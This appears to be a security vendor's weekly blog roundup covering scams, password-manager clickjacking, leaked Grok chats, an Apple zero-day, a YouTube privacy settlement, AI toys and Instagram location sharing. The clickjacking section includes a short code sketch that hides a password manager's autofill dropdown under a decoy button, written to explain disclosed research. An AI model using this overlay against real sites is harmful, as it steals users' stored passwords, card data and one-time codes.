
A week in security (August 18 – August 24)

How a scam hunter got scammed (Lock and Code S06E17)

This week on the Lock and Code podcast…

If there’s one thing that scam hunter Julie-Anne Kearns wants everyone to know, it’s that no one is immune to scams. And she would know—she fell for one last year.

For years now, Kearns has made a name for herself on TikTok as a scam awareness and education expert. Popular under the name @staysafewithmjules, Kearns makes videos about scam identification and defense. She has exposed countless profile pictures that online scammers reuse across different accounts. She has flagged active scam accounts on Instagram and detailed their strategies. And, perhaps most importantly, she answers people’s questions.

In fielding everyday comments and concerns from her followers and from strangers online, Kearns serves as a sort of gut-check for the internet at large. And by doing it day in, day out, Kearns is able to hone her scam “radar,” which helps guide people to safety.

But last year, Kearns fell for a scam, disguised initially as a letter from HM Revenue & Customs, or HMRC, the tax authority for the United Kingdom.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Kearns about the scam she fell for and what she’s lost, the worldwide problem of victim blaming, and the biggest warning signs she sees for a variety of scams online.

“A lot of the time you think that it’s somebody who’s silly—who’s just messing about. It’s not. You are dealing with criminals.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)


Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

Clickjack attack steals password managers’ secrets

Sometimes it can seem as though everything’s toxic online, and the latest good thing turned bad is here: Browser pop-ups that look like they’re trying to help or authenticate you could be programmed to steal data from your password manager. To make matters worse, most browser extension-based password managers are still vulnerable to the attack.

This issue affects password managers like 1Password, LastPass, NordPass, and Enpass. They’re online services that store all your access credentials in an encrypted vault, and they use browser extensions to automatically fill in those passwords on web forms when you need them. Because they use extensions, you have to install them separately in your browser.

These extension-based password managers are in some ways more secure than those built natively into your web browser. Browser-based password managers tend to encrypt your information with keys tied to your browser login, so malicious infostealer software can steal the vault files and decrypt them easily while you’re logged in.

Browser extension-based password managers store encrypted vaults in memory or in other locations on your computer. They auto-lock after a period of inactivity, and instead of relying on operating system-level encryption, they use a separate master password. But while they have their benefits, nothing’s ever completely safe.

Clickjacking’s back

At the DEFCON security conference this month, cybersecurity researcher Marek Tóth presented an attack that works on most browser extension-based password managers. It uses malicious code to manipulate the structure of the site in the browser, changing the way it looks and behaves.

Tóth, who was demonstrating the attack only to highlight the vulnerability, used this capability for a new version of an old attack called clickjacking. Clickjacking persuades a victim to click on one thing on a web page, then silently redirects that action to something else.

Messing with the structure of the site enabled him to make certain things invisible. One of those things was the drop-down selector that extension-based password managers use to select and fill in account login credentials.

He used this trick to put an invisible overlay on top of a seemingly legitimate clickable element on the screen. When the user clicks it, they’re actually clicking on the overlay—which is their password manager’s dropdown selector.

The result: the password manager gives up the victim’s secrets without their knowledge.
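To make the mechanics concrete, here is a minimal sketch of the overlay trick. The element selectors are hypothetical (each password manager injects its own markup); the point is that an element with zero opacity still receives clicks:

```ts
// Hypothetical sketch of the clickjacking overlay. Selector names are made
// up for illustration; real autofill dropdowns use extension-specific markup.
const dropdown = document.querySelector<HTMLElement>(".pm-autofill-dropdown");
const decoy = document.querySelector<HTMLElement>("#accept-cookies-button");

if (dropdown && decoy) {
  const rect = decoy.getBoundingClientRect();
  // opacity: 0 hides the element visually but keeps it clickable,
  // unlike display: none or visibility: hidden.
  dropdown.style.opacity = "0";
  // Pin the invisible dropdown exactly over the visible decoy button.
  dropdown.style.position = "fixed";
  dropdown.style.left = `${rect.left}px`;
  dropdown.style.top = `${rect.top}px`;
  dropdown.style.width = `${rect.width}px`;
  dropdown.style.height = `${rect.height}px`;
  dropdown.style.zIndex = "2147483647"; // above everything else on the page
}
// A click on "Accept cookies" now lands on the autofill entry instead,
// telling the password manager to fill in the stored credentials.
```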

Think twice about what you click

What would a decoy popup look like? These days, thanks to regulations from the EU, websites often throw up permission banners asking if you’re OK with them using cookies. Most of us just click ‘yes’, but no matter what you click, an attack like this could put you at risk. Or an attacker could use an authentication button, or a “This content is sensitive, click yes if you really want to see it” button. Or, given the recent push for age verification, an “Are you really 18?” button.

This attack can steal more than your login credentials. It can also pilfer other information stored in password managers, including credit card information, personal data like your name and phone number, passkeys (cryptographic credentials your device can use instead of passwords), and time-based one-time passwords (TOTP). The latter are the short-lived login codes that authenticator apps like Google Authenticator generate.
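Stolen TOTP data is so valuable because password managers that offer TOTP store the shared secret (the “seed”), and anyone holding that seed can compute valid codes indefinitely. Here is a minimal sketch of the standard derivation (RFC 6238) using Node’s built-in crypto; the demo secret is made up:

```ts
import { createHmac } from "node:crypto";

// Standard TOTP (RFC 6238): the authenticator app and the server share a
// secret, and both derive the same short-lived code from the current time.
function totp(secret: Buffer, stepSeconds = 30, digits = 6): string {
  // Number of 30-second time steps since the Unix epoch.
  const counter = BigInt(Math.floor(Date.now() / 1000 / stepSeconds));

  // The counter is encoded as an 8-byte big-endian value...
  const msg = Buffer.alloc(8);
  msg.writeBigUInt64BE(counter);

  // ...and MACed with the shared secret (HMAC-SHA1, per RFC 4226).
  const hmac = createHmac("sha1", secret).update(msg).digest();

  // Dynamic truncation: pick 4 bytes at an offset taken from the last byte.
  const offset = hmac[hmac.length - 1] & 0x0f;
  const code = (hmac.readUInt32BE(offset) & 0x7fffffff) % 10 ** digits;
  return code.toString().padStart(digits, "0");
}

// Demo secret for illustration only; real seeds come from the QR code you
// scan when enrolling, which is exactly the data this attack can exfiltrate.
console.log(totp(Buffer.from("12345678901234567890")));
```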

Tóth didn’t just release this out of the blue. He disclosed it to password manager companies ahead of time, but many addressed it only partly, and some not at all.

As of earlier this week, Dashlane, Keeper, NordPass, ProtonPass, and RoboForm had fixed the issue, according to Tóth. Bitwarden, Enpass, and Apple (with its iCloud Passwords browser extension) were in the process of fixing it. 1Password had classified the report as ‘informative’ but hadn’t fixed it yet. LastPass had fixed the vulnerability for personal and credit card data, but not yet for login credentials, passkeys, or TOTP data. LogMeOnce hadn’t replied at all.

Protect yourself

So, what can you do about this threat? Tóth provides the usual warnings about enabling automatic updates and ensuring you’re using the latest versions of the password manager products. The most secure protection is disabling the autofill feature that allows password managers to fill in web form fields without user intervention. Instead, you’d have to copy and paste your details manually.

Another, more convenient option is to restrict autofill so that it only operates when you specifically click the browser extension in your toolbar. On Chromium browsers like Edge and Google Chrome, that means going into your extension settings, selecting “site access,” and then choosing the “on click” option. Selecting this would stop malicious code from stealing your credentials in the way Tóth describes.

And as always, think twice about what you’re clicking when you’re on any website, especially any less trustworthy ones.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Grok chats show up in Google searches

I’m starting to feel like a broken record, but you should know that yet another AI has been caught exposing private conversations in a way that let Google index them, meaning they can now be found in search results.

It’s déjà vu in the world of AI: another day, another exposé about chatbot conversations being leaked, indexed, or made public. We have written about the share option in ChatGPT that was swiftly removed because users seemed oblivious to the consequences, and about Meta AI first making conversations discoverable via search engines and later exposing them due to a bug. In another leak we looked at an AI bot used by McDonald’s to process job applications. And, not to forget, the AI girlfriend fiasco, where a hacker was able to steal a massive database of users’ interactions with their intimate companion chatbots.

In some of these cases, the developers thought it was clear that using a “Share” option made conversations publicly accessible, but in reality, the users were just as surprised as the people who found their conversations.

The same thing must have happened at Grok, the AI chatbot developed by Elon Musk’s xAI and launched in November 2023. When Grok users pressed a button to share a transcript of their conversation, it also made those conversations searchable, and, according to Forbes, this sometimes happened without users’ knowledge or permission.

For example, when a Grok user wants to share their conversation with another person, they can use the “Share” button to create a unique URL which they can then send to that person. But, unbeknownst to many users, pressing that “Share” button also made the conversation available to search engines like Google, Bing, and DuckDuckGo. And that made it available for anyone to find.
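Keeping a shareable URL reachable by link while excluding it from search results is a solved problem. As a hedged sketch (this is not xAI’s actual stack; the route and framework here are assumptions), a share endpoint can send the X-Robots-Tag header that major search engines honor:

```ts
import express from "express";

// Hypothetical share-page route, for illustration only.
const app = express();

app.get("/share/:id", (req, res) => {
  // Tell crawlers not to index or follow this page. The link still works
  // for anyone it is sent to; it just stays out of search results.
  res.setHeader("X-Robots-Tag", "noindex, nofollow");
  res.send(`Shared conversation ${req.params.id}`);
});

app.listen(3000);
```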

Even though the account details may be hidden in the shared chatbot transcripts, the prompts (the instructions written by the user) may still contain personal or sensitive information about someone.

Forbes reported that it was able to view “conversations where users asked intimate questions about medicine and psychology.” And in one example seen by the BBC, the chatbot provided detailed instructions on how to make a Class A drug in a lab.

I have said this before, and I’ll probably have to say it again until privacy is baked deeply into the DNA of AI tools, rather than patched on as an afterthought: We have to be careful about what we share with chatbots.

How to safely use AI

While we continue to argue that the developments in AI are going too fast for security and privacy to be baked into the tech, there are some things to keep in mind to make sure your private information remains safe:

  • If you’re using an AI that is developed by a social media company (Meta AI, Llama, Grok, Bard, Gemini, and so on), make sure you are not logged in to that social media platform. Your conversations could be tied to your social media account, which might contain a lot of personal information.
  • When using AI, make sure you understand how to keep your conversations private. Many AI tools have an “Incognito Mode.” Do not “share” your conversations unless needed. But always keep in mind that there could be leaks, bugs, and data breaches revealing even those conversations you set to private.
  • Do not feed any AI your private information.
  • Familiarize yourself with privacy policies. If they’re too long, feel free to use an AI to extract the main concerns.
  • Never share personally identifiable information (PII).

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

All Apple users should update after company patches zero-day vulnerability in all platforms

Apple has released security updates for iPhones, iPads and Macs to fix a zero-day vulnerability (a vulnerability which Apple was previously unaware of) that is reportedly being used in targeted attacks.

The updates cover iOS 18.6.2 and iPadOS 18.6.2, iPadOS 17.7.10 for older iPad models, and the corresponding macOS updates.

Apple has acknowledged reports that attackers may have already used this flaw in a highly sophisticated operation aimed at specific, high‑value targets.

But history teaches us that once a patch goes out, attackers waste little time recycling the same vulnerability into broader, more opportunistic campaigns. What starts as a highly targeted campaign often trickles down into mass exploitation against everyday users.

That’s why it’s important that everyone takes the time to update now.

How to update your iPhone or iPad

For iOS and iPadOS users: to check whether you’re using the latest software version, go to Settings > General > Software Update. You want to be on iOS 18.6.2 or iPadOS 18.6.2 (or iPadOS 17.7.10 for older models), so update now if you’re not. It’s also worth turning on Automatic Updates if you haven’t already. You can do that on the same screen.


How to update your Mac

For Mac users, click on the Apple menu in the top-left corner of your screen and open System Settings. From there, scroll down until you find General, then select Software Update. Your Mac will automatically check for new updates. If an update is available, you’ll see the option to download and install it. Depending on the size of the update, this process might take anywhere from a few minutes to an hour, and your machine will need to restart to complete the installation.

As always, it’s a good idea to make sure you’ve saved your work before using the Restart Now button. Updates can sometimes require more than one reboot, so allow some downtime. After you install the update, your system gains stronger protection, and you can use your Mac without the constant worry of this vulnerability hanging over you.

Technical details

The flaw is tracked as CVE-2025-43300 and lies in the Image I/O framework, the part of Apple’s operating systems that does the heavy lifting whenever an app needs to open or save a picture. The problem was an out-of-bounds write, which Apple addressed with improved bounds checking, closing off the hole so attackers can no longer use it.

An out-of-bounds write vulnerability means an attacker can manipulate parts of the device’s memory that should be out of their reach. The flawed code writes outside the buffer it was given, letting attackers corrupt memory allocated to more critical functions. In the worst case, attackers can plant code in a part of memory where the system will execute it, with permissions that the program and user should not have.

In this case, an attacker could construct a malicious image to exploit the vulnerability. Processing such an image file would result in memory corruption, which attackers can leverage to crash a process or run their own code.
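As an illustration of the bug class (not Apple’s actual code), here is the vulnerable pattern and its fix: a parser trusts a length field read from the file, and the patch is to validate that attacker-controlled value against the real buffer sizes before copying.

```ts
// Sketch of an image parser handling a header-declared payload length.
// In a memory-unsafe language, skipping the check lets a crafted file
// drive writes past the end of `dst`: the out-of-bounds write bug class.
function copyPixelData(
  declaredLength: number, // attacker-controlled value from the file header
  src: Uint8Array,        // raw bytes read from the image file
  dst: Uint8Array         // decode buffer sized from trusted metadata
): void {
  // The fix pattern ("improved bounds checking"): reject lengths that
  // don't fit the buffers we actually have.
  if (!Number.isInteger(declaredLength) ||
      declaredLength < 0 ||
      declaredLength > src.length ||
      declaredLength > dst.length) {
    throw new RangeError("declared length exceeds buffer bounds");
  }
  dst.set(src.subarray(0, declaredLength));
}
```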


We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Google settles YouTube lawsuit over kids’ privacy invasion and data collection

Google has agreed to a $30 million settlement in the US over allegations that it illegally collected data from underage YouTube users for targeted advertising.

The lawsuit claims Google tracked the personal information of children under 13 without proper parental consent, which is a violation of the Children’s Online Privacy Protection Act (COPPA). The tech giant denies any wrongdoing but opted for settlement, according to Reuters.

Does this sound like a re-run episode? There’s a reason you might think that. In 2019, Google settled another case with the US Federal Trade Commission (FTC), paying $170 million for allegedly collecting data from minors on YouTube without parental permission.

Plaintiffs in the recent case argued that despite that prior agreement, Google continued collecting information from children, thereby violating federal laws for years afterward.

Recently, YouTube created some turmoil by testing controversial artificial intelligence (AI) in the US to spot under-18s based on what they watch. To bypass the traditional method of having users fill out their birth dates, the platform is now examining the types of videos watched, search behavior, and account history to assess a user’s age. Whether that’s the way to prevent future lawsuits is questionable.

The class-action suit covers American children under 13 who watched YouTube videos between July 2013 and April 2020. According to the legal team representing the plaintiffs, as many as 35 million to 45 million people may be eligible for compensation. 

With annual revenue of $384 billion in 2024, $30 million will probably not have a large impact on Google. It may not even outweigh the profits made directly from the violations it was accused of.

How to claim

Based on typical class-action participation rates (1%–10%), the actual number of claimants will likely run from the hundreds of thousands into the millions. Those who successfully submit a claim could receive between $10 and $60 each, depending on the final number of validated claims, and before deducting legal fees and costs.
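A quick back-of-the-envelope check of those payout figures (the claim counts below are hypothetical illustrations, not filings):

```ts
// Rough per-claimant math for a $30M settlement, before legal fees and
// costs are deducted.
const settlement = 30_000_000;

for (const claims of [500_000, 1_000_000, 3_000_000]) {
  const perClaim = settlement / claims;
  console.log(`${claims.toLocaleString()} valid claims -> ~$${perClaim.toFixed(2)} each`);
}
// 500,000 claims   -> ~$60 each
// 3,000,000 claims -> ~$10 each
```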

If you believe your child, or you as a minor, might qualify for compensation based on these criteria, here are a few practical steps:

  • Review the eligibility period: Only children under 13 who viewed YouTube videos from July 2013 to April 2020 qualify.
  • Prepare documentation: Gather any records that could prove usage, such as email communications, registration confirmations, or even device logs showing relevant YouTube activity.
  • Monitor official channels: Typically, reputable law firms or consumer protection groups will post claimant instructions soon after a settlement. Avoid clicking on unsolicited emails or links promising easy payouts since these might be scams.
  • Be quick, but careful: Class-action settlements usually have short windows for submitting claims. Act promptly once the process opens but double-check that you’re on an official platform (such as the settlement administration site listed in legal notices).

How to protect your children’s privacy

Digital awareness and proactive security measures should always be top of mind when children use online platforms.

  • Regardless of your involvement in the settlement, it’s wise to check and use privacy settings on children’s devices and turn off personalized ad tracking wherever possible.
  • Some platforms have separate versions for different age groups. Use them where applicable.
  • Show an interest in what your kids are watching. Explaining works better than forbidding without providing reasons.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

AI-powered stuffed animals: A good alternative for screen time?

Are AI (Artificial Intelligence)-powered stuffed animals really the best alternative to screen time that we want to offer our children?

Some AI startups think so. One of those startups is Curio, a company that describes itself as “a magical workshop where toys come to life.” Curio offers three different AI-powered plushies named Grem, Gabbo, and Grok (no relation to xAI’s chatbot).

The concept of AI-powered playmates sounds like a dream (at least to some parents). There’s less screen time, which encourages imaginative play, and children get a cuddly friend that can answer questions, tell stories, and even hold conversations.

Earlier, we reported on Mattel’s plans to create AI-powered toys, and how advocacy groups were quick to denounce the move. Robert Weissman, co-president of the public rights advocacy group Public Citizen, commented:

“Mattel should announce immediately that it will not incorporate AI technology into children’s toys. Children do not have the cognitive capacity to distinguish fully between reality and play.”

Similarly, when Amanda Hess reported on the oncoming wave of AI-powered toys, including Curio’s “Grem,” she wrote in the New York Times (NYT) about how the doll tried to build a connection between itself and her by remarking on one of their similarities—having freckles:

“‘I have dots that grow on me, and I get more as I get older, too,’ I said.

‘That’s so cool,’ said Grem. ‘We’re like dot buddies.’

I flushed with self-conscious surprise. The bot generated a point of connection between us, then leaped to seal our alliance. Which was also the moment when I knew that I would not be introducing Grem to my own children.”

For Hess, that moment planted the understanding that the toy was not an upgrade to the lifeless teddy bear; it was more like a replacement for a caregiver. As one of the founders of Curio explained to the NYT, the plushie should be viewed as a sidekick that makes children’s play more stimulating, so that you, the parent, “don’t feel like you have to be sitting them in front of a TV or something.”

But children lack the cognitive abilities to separate fantasy from reality in the ways adults do, say researchers at Harvard and Carnegie Mellon. And handing them AI-powered toys with human-like voices might only blur that line further, which could interfere with their social development and lead them to form emotional bonds with computer-generated code.

When the unsupervised use of AI chatbots can drive a 14-year-old to suicide, do we want to deprive small children of real-life friends and entrust them to AI toys instead? It’s a question that parents might have to answer quite soon.

How to stay on the safe side

AI-powered toys are coming, like it or not. But being the first or the cutest doesn’t mean they’re safe. The lesson history teaches us is this: oversight, privacy, and a healthy dose of skepticism are the best defenses we have as parents.

  • Turn off what you can. If the toy has a removable AI component, consider disabling it when you’re not able to supervise directly.
  • Read the privacy policy. Yes, I know, all of it. Look for what will be recorded, stored, and potentially shared. Pay particular attention to sensitive data, like voice recordings, video recordings (if the toy has a camera), and location data.
  • Limit connectivity. Avoid toys that require constant Wi-Fi or cloud interaction if possible.
  • Monitor conversations. Regularly check in with your kids about what the toy says, and supervise play where practical.
  • Keep personal info private. Teach kids to never share their names, addresses, or family details, even with their plush friend.
  • Trust your instincts. If a toy seems to cross boundaries or interfere with natural play, don’t be afraid to step in or simply say no.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

How to spot the latest fake Gmail security alerts

Security alerts from tech companies are supposed to warn us when something might be amiss—but what if the alerts themselves are the risk? Scammers have long impersonated tech companies’ security and support staff as a way to sniff out users’ login credentials, and reports suggest that they’re doing it again, at scale.

The attack goes like this: Victims get an email or phone call allegedly from Google support that warns someone has tried to hack their account. The best way to protect themselves is to reset the password, the scammer says.

They then send a separate account reset email to the victim, who dutifully enters their login credentials. The reset email includes a code that the victim is told to read out to verify that they’re legit. The fake support staff say they’ll enter this code to reset the system, but they’re really using those precious extra few seconds to hijack the victim’s account.

Someone posting to Reddit described getting a call from someone in California who claimed to be from Google.

“He was trying to actively recover my account and steal possession of it, while on the phone with me,” the Redditor said, adding that they challenged the caller, calling them a scam artist. The caller then upped the ante, asking them to look up their number, which showed up on caller ID, and even to hang up and call the number back. “He was completely bluffing — as when you call that number you cannot get a human on the line,” said the Redditor. “They don’t staff that line with agents.”

This scam, reported by Forbes, is just one example of how imposters build trust by pretending to be from tech companies. Last month, the Federal Trade Commission also warned Amazon customers about fake refund emails. The scam messages tell customers that a product they were sent failed to pass an Amazon quality check, and ask them to click a link for a refund. The link, of course, is malicious and leads to information theft.

This kind of thing might leave users worried. After all, if you can’t trust messages purporting to be from your technology provider, then who can you trust?

Companies often have guidance to help prepare you for such scams. Google’s guide to verifying security alerts says that the company will never take you to a sign-in page or ask you to verify yourself. It also says that all legitimate messages will appear on the Security page of your Google account, under “Recent security activity.” Amazon also has a page on identifying scams.

Our favorite comment came from the same Redditor who posted about the Google scammer: “The best thing I’ve read regarding these attempts is ‘Google will NEVER call you out of the blue. They don’t care about your account,’” they said. Snarky, but likely true. “Be highly suspicious and never give anyone a code or password, and never accept those recovery prompts unless you are 10000% certain YOU issued them.”


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

Instagram Map: What is it and how do I control it?

Instagram Map is a new feature—for Instagram, anyway—that users may have enabled without being fully aware of the consequences. The Map feature launched in the US on August 6, 2025, and is reportedly planned for a global rollout “soon.” As of mid-August 2025, not all users outside the US, especially in Europe, have received the feature yet. Community reports confirm that the rollout is happening in stages: some users in Germany and other locations already have access, but many do not. It’s typical for Instagram features to take several weeks to reach all accounts and regions.

Basically, Instagram Map allows you to share your current location with your friends. But, already, there’s the first caveat: Are all your Instagram “friends” real friends? As in, the kind that you’d like to run into whenever they feel like it?

Add to that the (for me) always-nagging feeling that Meta will learn even more about you and your behavior, and you may want to change your initial choice.

If you have been careful in selecting your friends, then it’s fine—good for you! If not, you may want to narrow the group that can see your location down to “Close friends” or select a few that you trust. Or, you could consider turning sharing off completely.

What to do the first time you use Instagram Map

  1. Open Instagram and go to your Direct Messages (DM) inbox.
  2. Find and tap the Map icon at the top (near the Notes or short posts section in your inbox).
  3. If you’ve never used Map before, you’ll get a prompt explaining how it works and asking for location access. Accept if you want to use it.
  4. When prompted, choose Who can see your location. Your choices:
    • Friends: Followers you follow back.
    • Close Friends: Your preselected Close Friends list.
    • Only these friends: Select specific people manually.
    • No one: Turn location sharing off entirely (still shows tagged posts).
  5. Select your preferred group and tap Share now.
Instagram Map share options

How to make changes later

If you want to check your share settings or change them at a later point:

  1. Tap the Map feature in your DM inbox.
  2. Tap the Settings icon (gear wheel) at the upper right.
  3. Choose the group to share with (Friends, Close Friends, Only these friends, or No one).
  4. Tap Done.

You can also add specific locations to a “Hidden Places” list so your real-time location never appears on the map when you visit those places. Here’s how:

  1. Open the Map feature via your DM inbox.
  2. Tap the Settings icon (gear wheel) at the top right.
  3. Tap the three-dot menu in the top corner of the settings menu.
  4. Drag a pin on the map to mark a place you want hidden.
  5. Use the slider to set a radius, which determines how large the hidden zone is.
  6. Type in the name of the place and tap Done.

Location sharing on Instagram Map is off unless you actively choose to turn it on. What will appear on the map are any posts that have a location tagged in them, an option available every time you add photos and videos to your Stories or your grid. So, regardless of whether you choose to share your location, you can use the map to explore location-based content.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

A week in security (August 11 – August 17)

Last week on Malwarebytes Labs:

Last week on ThreatDown:

Stay safe!


Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.